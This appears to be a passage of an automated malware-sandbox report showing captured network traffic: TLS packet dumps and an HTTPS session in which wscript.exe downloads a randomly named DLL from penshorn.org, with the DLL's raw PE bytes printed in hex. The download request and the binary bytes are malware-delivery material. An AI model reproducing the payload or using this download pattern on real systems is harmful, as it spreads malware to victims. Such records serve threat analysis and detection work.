                                                                                                Mar 17, 2023 09:07:31.205951929 CET498OUTData Raw: 16 03 03 00 97 01 00 00 93 03 03 64 14 1f c3 9d b6 26 9c eb cd dc 51 e0 31 99 bb b5 0a c5 43 3d 45 e0 9a 65 e3 ba 8c ee 95 60 1a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                Data Ascii: d&Q1C=Ee`*,+0/$#('=<5/@#
                                                                                                Mar 17, 2023 09:07:31.450947046 CET499INData Raw: 16 03 03 00 41 02 00 00 3d 03 03 0a 38 4f ae bf 34 b9 e4 7e 5a 56 4f 5c 88 41 e7 bd 62 2d 91 cd 87 c0 f7 20 1a 3b 3e 72 19 12 b9 00 c0 30 00 00 15 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 23 00 00 00 17 00 00 16 03 03 03 cf 0b 00 03 cb 00 03 c8
                                                                                                Data Ascii: A=8O4~ZVO\Ab- ;>r0#00* aH0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT Department10Uexample.c
                                                                                                Mar 17, 2023 09:07:31.450994015 CET499INData Raw: 99 81 2f 3a ba d5 4f 8c 1a a7 cb f5 27 a6 ab 1f b2 4d ed a9 b1 46 56 3a 11 3b 8f fe fe 1b 37 2a 9e a4 18 e6 f3 a4 a3 ef b8 71 e6 82 58 9b 30 9d 02 f9 4f 7d 40 17 a9 46 ab fa 57 47 02 65 5b f8 48 7f f6 2c fe 16 03 03 00 04 0e 00 00 00
                                                                                                Data Ascii: /:O'MFV:;7*qX0O}@FWGe[H,
                                                                                                Mar 17, 2023 09:07:31.456162930 CET500OUTData Raw: 16 03 03 00 25 10 00 00 21 20 17 34 1f 30 7c dd 9a 63 5a 06 1e df 4c a7 55 35 62 17 9d 79 a2 c3 b0 ac bc 6d 2b 90 7a 17 c7 3a 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 d7 5d f3 02 ad 64 72 6c 05 4f d9 68 ee d4 d7 3f 08 32 72 aa 0f
                                                                                                Data Ascii: %! 40|cZLU5bym+z:(]drlOh?2rtW
                                                                                                Mar 17, 2023 09:07:31.686403036 CET500INData Raw: 16 03 03 00 ba 04 00 00 b6 00 00 01 2c 00 b0 41 31 a7 4e 61 dc 74 8b 8a 90 c0 42 d1 49 f2 c2 87 87 66 b8 e3 79 4b 2f 6e 63 e3 0e c1 3e 23 68 9a e8 69 35 fb d1 22 5a 90 9c 3e e9 2b 82 43 de ca 5a 0d 70 b4 e2 41 ce 01 f9 43 9e 75 2a d9 c4 a7 e8 6b
                                                                                                Data Ascii: ,A1NatBIfyK/nc>#hi5"Z>+CZpACu*kj[rmPZnXc`:(*47;!9`>2$qfiLBlq*\96H\(Cf<"KV&L^=N1=sVwN
                                                                                                Mar 17, 2023 09:07:31.688262939 CET500OUTData Raw: 17 03 03 00 9e 00 00 00 00 00 00 00 01 cd 21 86 81 1b 70 9b e9 83 cd 46 64 35 82 76 9a 1a a0 5d 1e 41 12 05 d2 02 e6 23 ee 13 f4 ae 96 a7 47 a6 17 a4 cf c8 fa 67 47 34 64 93 0b 7a 85 ca 80 23 ea 1c 21 4a 82 4a 76 54 9c 5b 45 b9 c6 1d f1 2d 98 d7
                                                                                                Data Ascii: !pFd5v]A#GgG4dz#!JJvT[E-CR\&%18QmV7WV.RG%UIbr(yod($=o?1K@83
                                                                                                Mar 17, 2023 09:07:32.965385914 CET500INData Raw: 17 03 03 01 3e 7f 43 a4 66 a7 3c 22 4c 0a fd 55 ed 8b ee 19 19 ba 5e 51 06 51 cd 3c 9c de 9b c8 27 ec d6 e5 b7 74 a0 ad ad 8d ab c8 83 83 6d 48 03 17 1b 3d c8 31 b7 a3 30 85 32 74 d6 91 a9 18 16 9c 08 e0 09 b5 d3 77 d1 ec 2d ec e8 50 17 a8 c9 7c
                                                                                                Data Ascii: >Cf<"LU^QQ<'tmH=102tw-P|<S:rPlfQ)5|,G9OM17v&dqV$D'[sgcMY\`NLzegg+uqSnw4fk&K
                                                                                                Mar 17, 2023 09:07:35.964777946 CET501INData Raw: 15 03 03 00 1a 7f 43 a4 66 a7 3c 22 4d 52 3c 25 07 7f 7b 47 22 41 97 15 59 72 e1 bb 45 2b 84
                                                                                                Data Ascii: Cf<"MR<%{G"AYrE+
                                                                                                Mar 17, 2023 09:07:35.968456030 CET501OUTData Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 02 5d d5 84 f1 e9 44 b2 2f f4 a8 41 6b 6e fc fe 39 50 7c
                                                                                                Data Ascii: ]D/Akn9P|


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.449685203.26.41.131443C:\Windows\SysWOW64\wscript.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2023-03-17 08:06:24 UTC0OUTGET /admin/Ses8712iGR8du/ HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                Host: penshorn.org
                                                                                                2023-03-17 08:06:24 UTC0INHTTP/1.1 200 OK
                                                                                                Date: Fri, 17 Mar 2023 08:06:24 GMT
                                                                                                Server: Apache
                                                                                                X-Powered-By: PHP/7.0.33
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Expires: Fri, 17 Mar 2023 08:06:24 GMT
                                                                                                Content-Disposition: attachment; filename="HI8auq9R7DjJI9Xd0sXHrrNQ8ULm.dll"
                                                                                                Content-Transfer-Encoding: binary
                                                                                                Set-Cookie: 64141f80cbc98=1679040384; expires=Fri, 17-Mar-2023 08:07:24 GMT; Max-Age=60; path=/
                                                                                                Last-Modified: Fri, 17 Mar 2023 08:06:24 GMT
                                                                                                Connection: close
                                                                                                Transfer-Encoding: chunked
                                                                                                Content-Type: application/x-msdownload
                                                                                                2023-03-17 08:06:24 UTC0INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52
                                                                                                Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonR
                                                                                                2023-03-17 08:06:25 UTC8INData Raw: 44 09 a0 f3 42 0f 7f 44 09 b0 f3 42 0f 7f 44 09 c0 f3 42 0f 7f 44 09 d0 f3 42 0f 7f 44 09 e0 f3 42 0f 7f 44 01 f0 f3 0f 7f 00 c3 48 83 ec 28 e8 ab 1a 00 00 84 c0 75 04 32 c0 eb 12 e8 fe 03 00 00 84 c0 75 07 e8 dd 1a 00 00 eb ec b0 01 48 83 c4 28 c3 48 83 ec 28 e8 23 03 00 00 48 85 c0 0f 95 c0 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 a1 02 00 00 b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 84 c9 75 0a e8 ff 03 00 00 e8 9a 1a 00 00 b0 01 48 83 c4 28 c3 cc cc cc 48 83 ec 28 e8 e7 03 00 00 b0 01 48 83 c4 28 c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 40 48 8b e9 4d 8b f9 49 8b c8 49 8b f0 4c 8b ea e8 d0 1a 00 00 4d 8b 67 08 4d 8b 37 49 8b 5f 38 4d 2b f4 f6 45 04 66 41 8b 7f 48 0f 85 dc 00 00 00 48 89 6c 24 30 48 89 74 24 38 3b 3b
                                                                                                Data Ascii: DBDBDBDBDBDH(u2uH(H(#HH(H(3H(H(uH(H(H(H\$Hl$Ht$WATAUAVAWH@HMIILMgM7I_8M+EfAHHl$0Ht$8;;
                                                                                                2023-03-17 08:06:25 UTC16INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:25 UTC16INData Raw: 34 30 30 30 0d 0a 66 89 48 08 c3 4c 8b 02 0f b6 4a 08 4c 89 00 88 48 08 c3 4c 8b 02 8b 4a 08 4c 89 00 89 48 08 c3 8b 0a 44 0f b7 42 04 89 08 66 44 89 40 04 c3 8b 0a 44 0f b6 42 04 89 08 44 88 40 04 c3 48 8b 0a 48 89 08 c3 0f b6 0a 88 08 c3 8b 0a 89 08 c3 90 49 83 f8 20 77 17 f3 0f 6f 0a f3 42 0f 6f 54 02 f0 f3 0f 7f 09 f3 42 0f 7f 54 01 f0 c3 48 3b d1 73 0e 4e 8d 0c 02 49 3b c9 0f 82 41 04 00 00 90 83 3d 91 c3 01 00 03 0f 82 e3 02 00 00 49 81 f8 00 20 00 00 76 16 49 81 f8 00 00 18 00 77 0d f6 05 ea d3 01 00 02 0f 85 64 fe ff ff c5 fe 6f 02 c4 a1 7e 6f 6c 02 e0 49 81 f8 00 01 00 00 0f 86 c4 00 00 00 4c 8b c9 49 83 e1 1f 49 83 e9 20 49 2b c9 49 2b d1 4d 03 c1 49 81 f8 00 01 00 00 0f 86 a3 00 00 00 49 81 f8 00 00 18 00 0f 87 3e 01 00 00 66 66 66 66 66 66 0f
                                                                                                Data Ascii: 4000fHLJLHLJLHDBfD@DBD@HHI woBoTBTH;sNI;A=I vIwdo~olILII I+I+MII>ffffff
                                                                                                2023-03-17 08:06:25 UTC24INData Raw: 48 83 ec 20 48 8b 1d 0b a4 01 00 48 8b cb e8 3b 18 00 00 48 8b cb e8 db 3f 00 00 48 8b cb e8 cb 40 00 00 48 8b cb e8 7f 43 00 00 48 8b cb e8 4b f5 ff ff b0 01 48 83 c4 20 5b c3 cc cc cc 33 c9 e9 19 be ff ff cc 40 53 48 83 ec 20 48 8b 0d b3 b9 01 00 83 c8 ff f0 0f c1 01 83 f8 01 75 1f 48 8b 0d a0 b9 01 00 48 8d 1d f9 a3 01 00 48 3b cb 74 0c e8 1b 1b 00 00 48 89 1d 88 b9 01 00 b0 01 48 83 c4 20 5b c3 48 83 ec 28 48 8b 0d b5 bf 01 00 e8 fc 1a 00 00 48 8b 0d b1 bf 01 00 48 83 25 a1 bf 01 00 00 e8 e8 1a 00 00 48 8b 0d 75 b9 01 00 48 83 25 95 bf 01 00 00 e8 d4 1a 00 00 48 8b 0d 69 b9 01 00 48 83 25 59 b9 01 00 00 e8 c0 1a 00 00 48 83 25 54 b9 01 00 00 b0 01 48 83 c4 28 c3 cc 48 8d 15 fd 0b 01 00 48 8d 0d f6 0a 01 00 e9 25 3e 00 00 cc 48 83 ec 28 e8 37 12 00 00
                                                                                                Data Ascii: H HH;H?H@HCHKH [3@SH HuHHH;tHH [H(HHH%HuH%HiH%YH%TH(HH%>H(7
                                                                                                2023-03-17 08:06:25 UTC32INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:25 UTC32INData Raw: 34 30 30 30 0d 0a 4c 8b 00 49 8b cc 48 ff c1 45 38 3c 08 75 f7 48 ff c2 48 83 c0 08 48 03 d1 48 3b c6 75 e2 48 89 55 50 41 b8 01 00 00 00 49 8b ce e8 3c d7 ff ff 48 8b d8 48 85 c0 75 32 33 c9 e8 4d fb ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 3d fb ff ff 48 83 c3 08 48 3b de 75 ef 41 8b f4 48 8b cf e8 29 fb ff ff 8b c6 e9 8d 00 00 00 4a 8d 0c f0 4c 8b f7 48 89 4d 58 4c 8b e1 48 3b fe 74 4c 48 2b c7 48 89 45 48 4d 8b 06 49 83 cf ff 49 ff c7 43 80 3c 38 00 75 f6 48 8b d1 49 ff c7 49 2b d4 4d 8b cf 48 03 55 50 49 8b cc e8 03 38 00 00 85 c0 75 5e 48 8b 45 48 48 8b 4d 58 4e 89 24 30 4d 03 e7 49 83 c6 08 4c 3b f6 75 bb 33 c9 49 89 5d 00 e8 b8 fa ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 a8 fa ff ff 48 83 c3 08 48 3b de 75 ef 48 8b cf e8 97 fa ff ff 33 c0 48 8b
                                                                                                Data Ascii: 4000LIHE8<uHHHH;uHUPAI<HHu23MHH;tH=HH;uAH)JLHMXLH;tLH+HEHMIIC<8uHII+MHUPI8u^HEHHMXN$0MIL;u3I]HH;tHHH;uH3H
                                                                                                2023-03-17 08:06:25 UTC40INData Raw: 5c 24 08 57 48 83 ec 20 48 8b f9 e8 2e 00 00 00 33 db 48 85 c0 74 1a 49 ba 70 20 d3 1c df 0f ed d1 48 8b cf ff 15 54 b7 00 00 85 c0 0f 95 c3 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 40 53 48 83 ec 20 33 c9 e8 1b d5 ff ff 90 48 8b 05 c3 63 01 00 8b c8 83 e1 3f 48 8b 1d 9f 7f 01 00 48 33 d8 48 d3 cb 33 c9 e8 4e d5 ff ff 48 8b c3 48 83 c4 20 5b c3 cc 48 89 5c 24 08 4c 89 4c 24 20 57 48 83 ec 20 49 8b f9 8b 0a e8 d7 d4 ff ff 90 48 8b 05 7f 63 01 00 8b c8 83 e1 3f 48 8b 1d 73 7f 01 00 48 33 d8 48 d3 cb 8b 0f e8 0a d5 ff ff 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 4c 8b dc 48 83 ec 28 b8 03 00 00 00 4d 8d 4b 10 4d 8d 43 08 89 44 24 38 49 8d 53 18 89 44 24 40 49 8d 4b 08 e8 8f ff ff ff 48 83 c4 28 c3 cc cc 48 89 0d 11 7f 01 00 48 89 0d 12 7f 01 00 48 89 0d
                                                                                                Data Ascii: \$WH H.3HtIp HTH\$0H _@SH 3Hc?HH3H3NHH [H\$LL$ WH IHc?HsH3HHH\$0H _LH(MKMCD$8ISD$@IKH(HHH
                                                                                                2023-03-17 08:06:25 UTC48INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:25 UTC48INData Raw: 34 30 30 30 0d 0a 48 8b 45 08 83 a0 a8 03 00 00 fd 8b c7 48 8b 4d 28 48 33 cd e8 97 44 ff ff 48 8b 5d 60 48 8b 75 68 48 8b 7d 70 48 8d 65 30 41 5f 41 5e 41 5d 41 5c 5d c3 cc 40 55 41 54 41 55 41 56 41 57 48 83 ec 60 48 8d 6c 24 50 48 89 5d 40 48 89 75 48 48 89 7d 50 48 8b 05 b6 43 01 00 48 33 c5 48 89 45 08 48 63 7d 60 49 8b f1 45 8b e0 4c 8b ea 48 8b d9 85 ff 7e 14 48 8b d7 49 8b c9 e8 c0 1b 00 00 3b c7 8d 78 01 7c 02 8b f8 44 8b 75 78 45 85 f6 75 07 48 8b 03 44 8b 70 0c f7 9d 80 00 00 00 44 8b cf 4c 8b c6 41 8b ce 1b d2 83 64 24 28 00 48 83 64 24 20 00 83 e2 08 ff c2 e8 05 d4 ff ff 33 d2 4c 63 f8 85 c0 0f 84 73 02 00 00 49 8b c7 48 03 c0 48 8d 48 10 48 3b c1 48 1b c0 48 23 c1 0f 84 3d 02 00 00 49 b8 f0 ff ff ff ff ff ff 0f 48 3d 00 04 00 00 77 31 48 8d
                                                                                                Data Ascii: 4000HEHM(H3DH]`HuhH}pHe0A_A^A]A\]@UATAUAVAWH`Hl$PH]@HuHH}PHCH3HEHc}`IELH~HI;x|DuxEuHDpDLAd$(Hd$ 3LcsIHHHH;HH#=IH=w1H
                                                                                                2023-03-17 08:06:25 UTC56INData Raw: e1 49 03 c1 66 48 0f 6e c8 66 0f 2f 25 75 da 00 00 0f 82 df 00 00 00 48 c1 e8 2c 66 0f eb 15 c3 d9 00 00 66 0f eb 0d bb d9 00 00 4c 8d 0d 34 eb 00 00 f2 0f 5c ca f2 41 0f 59 0c c1 66 0f 28 d1 66 0f 28 c1 4c 8d 0d fb da 00 00 f2 0f 10 1d 03 da 00 00 f2 0f 10 0d cb d9 00 00 f2 0f 59 da f2 0f 59 ca f2 0f 59 c2 66 0f 28 e0 f2 0f 58 1d d3 d9 00 00 f2 0f 58 0d 9b d9 00 00 f2 0f 59 e0 f2 0f 59 da f2 0f 59 c8 f2 0f 58 1d a7 d9 00 00 f2 0f 58 ca f2 0f 59 dc f2 0f 58 cb f2 0f 10 2d 13 d9 00 00 f2 0f 59 0d cb d8 00 00 f2 0f 59 ee f2 0f 5c e9 f2 41 0f 10 04 c1 48 8d 15 96 e2 00 00 f2 0f 10 14 c2 f2 0f 10 25 d9 d8 00 00 f2 0f 59 e6 f2 0f 58 c4 f2 0f 58 d5 f2 0f 58 c2 66 0f 6f 74 24 20 48 83 c4 58 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 f2 0f 10 15 c8 d8 00 00 f2
                                                                                                Data Ascii: IfHnf/%uH,ffL4\AYf(f(LYYYf(XXYYYXXYX-YY\AH%YXXXfot$ HXffffff
                                                                                                2023-03-17 08:06:25 UTC64INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:25 UTC64INData Raw: 34 30 30 30 0d 0a cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 81 ec 58 03 00 00 48 8b 05 e9 03 01 00 48 33 c4 48 89 84 24 40 03 00 00 48 c7 44 24 48 00 00 00 00 48 8d 05 46 d3 00 00 48 89 44 24 60 48 c7 44 24 68 00 00 00 00 48 c7 44 24 70 00 00 00 00 48 c7 44 24 50 00 00 00 00 48 c7 44 24 40 00 00 00 00 b8 08 00 00 00 48 6b c0 00 48 8d 0d 35 d3 00 00 48 89 8c 04 80 00 00 00 48 63 84 24 60 03 00 00 b9 08 00 00 00 48 6b c9 01 48 89 84 0c 80 00 00 00 b8 08 00 00 00 48 6b c0 02 48 c7 84 04 80 00 00 00 09 04 00 00 4c 8d 4c 24 58 41 b8 03 00 00 00 48 8d 94 24 80 00 00 00 48 8d 0d 35 f3 fe ff ff 15 4f 56 00 00 89 44 24 34 4c 8d 4c 24 40 4c 8d 44 24 50 48 8b 54 24 58 48 8d 0d 15 f3 fe ff ff 15 47 56 00 00 89 44 24 34 c7 44 24 28
                                                                                                Data Ascii: 4000HT$L$HXHH3H$@HD$HHFHD$`HD$hHD$pHD$PHD$@HkH5HHc$`HkHHkHLL$XAH$H5OVD$4LL$@LD$PHT$XHGVD$4D$(
                                                                                                2023-03-17 08:06:25 UTC72INData Raw: c0 75 06 ff 15 b5 34 00 00 33 d2 33 c9 ff 15 d3 36 00 00 85 c0 75 06 ff 15 a1 34 00 00 33 d2 33 c9 ff 15 bf 36 00 00 85 c0 75 06 ff 15 8d 34 00 00 33 d2 33 c9 ff 15 ab 36 00 00 85 c0 75 06 ff 15 79 34 00 00 33 d2 33 c9 ff 15 97 36 00 00 85 c0 75 06 ff 15 65 34 00 00 33 d2 33 c9 ff 15 83 36 00 00 85 c0 75 06 ff 15 51 34 00 00 33 d2 33 c9 ff 15 6f 36 00 00 85 c0 75 06 ff 15 3d 34 00 00 33 d2 33 c9 ff 15 5b 36 00 00 85 c0 75 06 ff 15 29 34 00 00 33 d2 33 c9 ff 15 47 36 00 00 85 c0 75 06 ff 15 15 34 00 00 33 d2 33 c9 ff 15 33 36 00 00 85 c0 75 06 ff 15 01 34 00 00 33 d2 33 c9 ff 15 1f 36 00 00 85 c0 75 06 ff 15 ed 33 00 00 33 d2 33 c9 ff 15 0b 36 00 00 85 c0 75 06 ff 15 d9 33 00 00 33 d2 33 c9 ff 15 f7 35 00 00 85 c0 75 06 ff 15 c5 33 00 00 33 d2 33 c9 ff 15
                                                                                                Data Ascii: u4336u4336u4336uy4336ue4336uQ433o6u=433[6u)433G6u43336u4336u3336u3335u333
                                                                                                2023-03-17 08:06:25 UTC80INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:25 UTC80INData Raw: 34 30 30 30 0d 0a 48 8b 44 24 20 0f be 00 85 c0 74 58 8b 04 24 c1 e8 0d 8b 0c 24 c1 e1 13 0b c1 89 04 24 48 8b 44 24 20 0f be 00 83 f8 61 7c 11 48 8b 44 24 20 0f be 00 83 e8 20 89 44 24 04 eb 0c 48 8b 44 24 20 0f be 00 89 44 24 04 8b 44 24 04 8b 0c 24 03 c8 8b c1 89 04 24 48 8b 44 24 20 48 ff c0 48 89 44 24 20 eb 9c 8b 05 0e e1 00 00 8b 0c 24 03 c8 8b c1 89 04 24 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 41 b9 64 00 00 00 4c 8d 05 cb e0 00 00 ba 67 00 00 00 48 8b 4c 24 60 ff 15 13 16 00 00 41 b9 64 00 00 00 4c 8d 05 de df 00 00 ba 6d 00 00 00 48 8b 4c 24 60 ff 15 f6 15 00 00 48 8b 4c 24 60 e8 e4 bc ff ff 8b 54 24 78 48 8b 4c 24 60 e8 16 bc ff
                                                                                                Data Ascii: 4000HD$ tX$$$HD$ a|HD$ D$HD$ D$D$$$HD$ HHD$ $$$HDL$ LD$HT$HL$HXAdLgHL$`AdLmHL$`HL$`T$xHL$`
                                                                                                2023-03-17 08:06:25 UTC88INData Raw: 00 00 00 00 40 3e 00 00 00 00 00 00 20 3f 18 2d 44 54 fb 21 e9 3f 00 00 00 00 80 84 1e 41 00 00 00 00 d0 12 73 41 ff ff ff ff ff ff ff 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 41 00 00 00 00 00 00 f0 bf 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00
                                                                                                Data Ascii: @> ?-DT!?AsAA
                                                                                                2023-03-17 08:06:25 UTC96INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:25 UTC96INData Raw: 34 30 30 30 0d 0a 03 04 00 00 00 00 00 00 30 a2 01 80 01 00 00 00 04 04 00 00 00 00 00 00 88 7e 01 80 01 00 00 00 05 04 00 00 00 00 00 00 40 a2 01 80 01 00 00 00 06 04 00 00 00 00 00 00 50 a2 01 80 01 00 00 00 07 04 00 00 00 00 00 00 60 a2 01 80 01 00 00 00 08 04 00 00 00 00 00 00 70 a2 01 80 01 00 00 00 09 04 00 00 00 00 00 00 f0 8a 01 80 01 00 00 00 0b 04 00 00 00 00 00 00 80 a2 01 80 01 00 00 00 0c 04 00 00 00 00 00 00 90 a2 01 80 01 00 00 00 0d 04 00 00 00 00 00 00 a0 a2 01 80 01 00 00 00 0e 04 00 00 00 00 00 00 b0 a2 01 80 01 00 00 00 0f 04 00 00 00 00 00 00 c0 a2 01 80 01 00 00 00 10 04 00 00 00 00 00 00 d0 a2 01 80 01 00 00 00 11 04 00 00 00 00 00 00 58 7e 01 80 01 00 00 00 12 04 00 00 00 00 00 00 78 7e 01 80 01 00 00 00 13 04 00 00 00 00 00 00 e0
                                                                                                Data Ascii: 40000~@P`pX~x~
                                                                                                2023-03-17 08:06:25 UTC104INData Raw: 00 00 00 00 00 00 68 c1 01 80 01 00 00 00 56 00 00 00 00 00 00 00 a0 a0 01 80 01 00 00 00 15 00 00 00 00 00 00 00 78 c1 01 80 01 00 00 00 57 00 00 00 00 00 00 00 88 c1 01 80 01 00 00 00 98 00 00 00 00 00 00 00 98 c1 01 80 01 00 00 00 8c 00 00 00 00 00 00 00 a8 c1 01 80 01 00 00 00 9f 00 00 00 00 00 00 00 b8 c1 01 80 01 00 00 00 a8 00 00 00 00 00 00 00 a8 a0 01 80 01 00 00 00 16 00 00 00 00 00 00 00 c8 c1 01 80 01 00 00 00 58 00 00 00 00 00 00 00 b0 a0 01 80 01 00 00 00 17 00 00 00 00 00 00 00 d8 c1 01 80 01 00 00 00 59 00 00 00 00 00 00 00 d8 a1 01 80 01 00 00 00 3c 00 00 00 00 00 00 00 e8 c1 01 80 01 00 00 00 85 00 00 00 00 00 00 00 f8 c1 01 80 01 00 00 00 a7 00 00 00 00 00 00 00 08 c2 01 80 01 00 00 00 76 00 00 00 00 00 00 00 18 c2 01 80 01 00 00 00 9c
                                                                                                Data Ascii: hVxWXY<v
                                                                                                2023-03-17 08:06:25 UTC112INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:25 UTC112INData Raw: 34 30 30 30 0d 0a b8 a6 4e fd 69 9c 3b 3e ab a4 5f 83 a5 6a 2b 3e d1 ed 0f 79 c3 cc 43 3e e0 4f 40 c4 4c c0 29 3e 9d d8 75 7a 4b 73 40 3e 12 16 e0 c4 04 44 1b 3e 94 48 ce c2 65 c5 40 3e cd 35 d9 41 14 c7 33 3e 4e 3b 6b 55 92 a4 72 3d 43 dc 41 03 09 fa 20 3e f4 d9 e3 09 70 8f 2e 3e 45 8a 04 8b f6 1b 4b 3e 56 a9 fa df 52 ee 3e 3e bd 65 e4 00 09 6b 45 3e 66 76 77 f5 9e 92 4d 3e 60 e2 37 86 a2 6e 48 3e f0 a2 0c f1 af 65 46 3e 74 ec 48 af fd 11 2f 3e c7 d1 a4 86 1b be 4c 3e 65 76 a8 fe 5b b0 25 3e 1d 4a 1a 0a c2 ce 41 3e 9f 9b 40 0a 5f cd 41 3e 70 50 26 c8 56 36 45 3e 60 22 28 35 d8 7e 37 3e d2 b9 40 30 bc 17 24 3e f2 ef 79 7b ef 8e 40 3e e9 57 dc 39 6f c7 4d 3e 57 f4 0c a7 93 04 4c 3e 0c a6 a5 ce d6 83 4a 3e ba 57 c5 0d 70 d6 30 3e 0a bd e8 12 6c c9 44 3e 15
                                                                                                Data Ascii: 4000Ni;>_j+>yC>O@L)>uzKs@>D>He@>5A3>N;kUr=CA >p.>EK>VR>>ekE>fvwM>`7nH>eF>tH/>L>ev[%>JA>@_A>pP&V6E>`"(5~7>@0$>y{@>W9oM>WL>J>Wp0>lD>
                                                                                                2023-03-17 08:06:25 UTC120INData Raw: 00 00 01 00 00 00 91 de 00 00 ce de 00 00 6a 53 01 00 00 00 00 00 19 33 0b 00 25 34 22 00 19 01 1a 00 0e f0 0c e0 0a d0 08 c0 06 70 05 60 04 50 00 00 d0 f8 00 00 a8 c4 01 00 cb 00 00 00 94 d7 00 00 ff ff ff ff 19 2d 09 00 1b 54 90 02 1b 34 8e 02 1b 01 8a 02 0e e0 0c 70 0b 60 00 00 18 f7 00 00 40 14 00 00 19 31 0b 00 1f 54 96 02 1f 34 94 02 1f 01 8e 02 12 f0 10 e0 0e c0 0c 70 0b 60 00 00 18 f7 00 00 60 14 00 00 11 0a 04 00 0a 34 09 00 0a 52 06 70 84 2a 00 00 01 00 00 00 02 e2 00 00 81 e2 00 00 81 53 01 00 00 00 00 00 01 17 0a 00 17 54 0e 00 17 34 0d 00 17 52 13 f0 11 e0 0f d0 0d c0 0b 70 01 0e 02 00 0e 32 0a 30 01 18 06 00 18 54 07 00 18 34 06 00 18 32 14 60 01 04 01 00 04 02 00 00 01 09 01 00 09 42 00 00 01 10 06 00 10 64 09 00 10 34 08 00 10 52 0c 70 11
                                                                                                Data Ascii: jS3%4"p`P-T4p`@1T4p``4Rp*ST4Rp20T42`Bd4Rp
                                                                                                2023-03-17 08:06:25 UTC128INData Raw: 0d 0a
                                                                                                Data Ascii:
